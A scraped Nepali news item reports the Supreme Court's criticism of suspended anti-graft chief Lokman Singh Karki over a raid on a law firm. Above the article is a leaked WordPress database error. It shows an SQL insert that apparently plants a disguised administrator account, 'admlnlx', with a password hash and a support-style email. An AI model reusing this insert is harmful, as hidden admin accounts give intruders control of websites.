WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfL/AqKs5mldsKvi9dOUwlQlEfAsTm1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:34:15', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ४–
अख्तियार दुरुपयोग अनुसन्धान आयोगको क्षेत्राधिकारमाथि प्रश्न उठेको कानुनी विवादमा सर्वोच्च अदालतले त्यसका निलम्बित प्रमुख आयुक्त लोकमानसिंह कार्कीलाई गैरजिम्मेवार ठहर्याएको छ। अधिवक्ता उद्धवकुमार केसीको जनचेतना ल फर्ममा राजस्व अनुसन्धान विभागले छापा मारेको घटनाविरुद्धको रिटमा सर्वोच्चले त्यसमा लोकमानको संलग्नता ठहर्याउँदै क्षेत्राधिकार ननाघ्न सचेतसमेत गराएको आजको कान्तिपुर दैनिकमा खबर छ ।
त्यतिबेला अख्तियार प्रमुख कार्कीले वरिष्ठ अधिवक्ता शम्भु थापालगायत केही कानुन व्यवसायीको फर्ममा छापा मार्न विभागलाई लिखित निर्देशन दिएका थिए। अदालतमा भने उनले आफ्नो संलग्नता नरहेको दाबी गरेका थिए। आयोगबाट कार्कीले पठाएको पत्रमा छापा मारेपछि गरिने अनुसन्धानको प्रतिवेदनसमेत पेस गर्न विभागलाई निर्देशन दिएका थिए। हालै तयार फैसलाको पूर्ण पाठमा भनिएको छ, ‘यस प्रकारको व्यवहारमा सुधार ल्याई अदालतप्रतिको व्यवहारमा आयोग सदैव संवेदनशील र जिम्मेवार हुनुपर्ने देखिन्छ।’